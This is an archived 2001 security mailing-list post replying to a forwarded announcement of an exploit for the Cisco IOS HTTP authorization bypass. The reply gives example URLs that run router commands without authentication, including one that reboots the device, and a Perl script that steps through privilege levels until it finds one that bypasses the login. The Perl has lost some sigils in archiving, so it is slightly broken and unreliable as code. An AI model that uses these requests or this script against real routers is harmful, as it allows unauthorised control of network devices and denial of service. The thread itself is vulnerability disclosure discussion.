OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
 
From: Ertan Kurt (ertankolympos.org)
Date: Mon Jul 02 2001 - 03:22:07 CDT

  • Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

    Hi T(L?)amer Sahin,

    This does not work! What does this tool do really??
    I tried on several vulnerable routers but your tool gave errors
    at random tries between 16 and 22 (couldnt pass 22)
    It just passed the vulnerable levels without saying anything.
    or gave access violation errors, lol it exploits itself!!
    btw, I use w2k w/sp2
    As i analyzed the traffic, i saw that you just copy-pasted the same
    url (doh!) from the advisory and made an incremental HTTP request.
    Let's check it first:
    --------------------
    GET /level/24/exec/.... HTTP/1.0
    Host: xxx.xxx.xxx.xxx
    --------------------
    But you forget smtg. I think Cisco put that four dots (....) because
    there can be any IOS command issued. :)
    or are you trying a directory traversal attack? :)
    A valid query should be like:
    /level/xx/exec/- (enuff for our test)
    or
    /level/xx/exec/-/sh/ip/interface/brief/CR
    or
    /level/xx/exec/-/reload/CR
    to be mean.

    I provide a working code below: (my first dayz at perl so do not
    bother the code)
    -------begin of working code------
    #!/usr/bin/perl
    # modified roelof's uni.pl
    # to check cisco ios http auth bug
    # cronos <cronosolympos.org>
    use Socket;
    print "enter IP (x.x.x.x): ";
    $host= <STDIN>;
    chop($host);
    $i=16;
    $port=80;
    $target = inet_aton($host);
    $flag=0;
    LINE: while ($i<100) {
    # ------------- Sendraw - thanx RFP rfpwiretrip.net
    my results=sendraw("GET /level/".$i."/exec/- HTTP/1.0\r\n\r\n");
    foreach $line (results){
            $line=~ tr/A-Z/a-z/;
            if ($line =~ /http\/1\.0 401 unauthorized/) {$flag=1;}
            if ($line =~ /http\/1\.0 200 ok/) {$flag=0;}
    }
            if ($flag==1){print "Not Vulnerable with $i\n\r";}
                    else {print "$line Vulnerable with $i\n\r"; last LINE; }
            $i++;
    sub sendraw {
            my ($pstr)=_;
            socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')||0) ||
                    die("Socket problems\n");
            if(connect(S,pack "SnA4x8",2,$port,$target)){
                    my in;
                    select(S); $|=1; print $pstr;
                    while(<S>){ push in, $_;}
                    select(STDOUT); close(S); return in;
            } else { die("Can't connect...\n"); }
    }
    }
    -------end of working code------

    ps: tamer, consider packing your executable so it wastes less space.
    or simply, delete it! :)

    Greetz,

    Ertan Kurt
    Security Specialist
    InfoNet Information Technologies
    www.infonet.com.tr

    This is a forwarded message
    From: Tamer Sahin <tamerstatu.com.tr>
    To: vuln-devsecurityfocus.com
    Date: Saturday, June 30, 2001, 8:10:39 PM
    Subject: Cisco IOS HTTP Configuration Exploit

    -----BEGIN PGP SIGNED MESSAGE-----
    Hash: SHA1

    Hi geeks..

    I wrote m$ based exploit cisco ios http vulnerability
    (http://www.securityfocus.com/bid/2936)

    Download;
    http://www.tamersahin.net/downloads/cisco_ios.zip

    ***snip***